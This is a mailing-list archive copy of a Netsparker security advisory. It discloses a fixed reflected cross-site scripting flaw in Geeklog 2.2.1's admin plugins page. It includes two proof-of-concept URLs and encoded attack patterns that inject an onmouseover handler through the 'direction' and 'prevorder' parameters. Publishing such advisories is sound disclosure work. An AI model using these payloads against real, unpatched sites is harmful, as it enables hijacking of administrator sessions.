Full Disclosure mailing list archives
Cross-Site Scripting Vulnerability in Geeklog 2.2.1
From: Daniel Bishtawi <daniel () netsparker com>
Date: Mon, 27 Apr 2020 13:53:53 +0200
Hello, We are informing you about a Cross-Site Scripting Vulnerability in Geeklog 2.2.1. Here are the details: Information -------------------- Advisory by Netsparker Name: Cross-Site Scripting Vulnerability in Geeklog Affected Software: Geeklog Affected Versions: 2.2.1 Vendor Homepage: https://www.geeklog.net/ Vulnerability Type: Cross-Site Scripting Severity: Important Status: Fixed CVSS Score (3.0): 7.4 (High) Netsparker Advisory Reference: NS-20-001 Technical Details -------------------- URL : http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=x "%20onmouseover=netsparker(0x01AAEC)%20x="&order=1&prevorder=pi_load Parameter Name : direction Parameter Type : GET Attack Pattern : x%22+onmouseover%3dnetsparker(0x01AAEC)+x%3d%22 URL : http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=ASC&order=1&prevorder=x "%20onmouseover=netsparker(0x019E05)%20x=" Parameter Name : prevorder Parameter Type : GET Attack Pattern : x%22+onmouseover%3dnetsparker(0x019E05)+x%3d%22 For more information: https://www.netsparker.com/web-applications-advisories/ns-20-001-cross-site-scripting-in-geeklog/ Regards, [image: upload image] Daniel Bishtawi | Marketing Administrator E: daniel () netsparker com <daniel () netsparker com> _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Cross-Site Scripting Vulnerability in Geeklog 2.2.1 Daniel Bishtawi (Apr 28)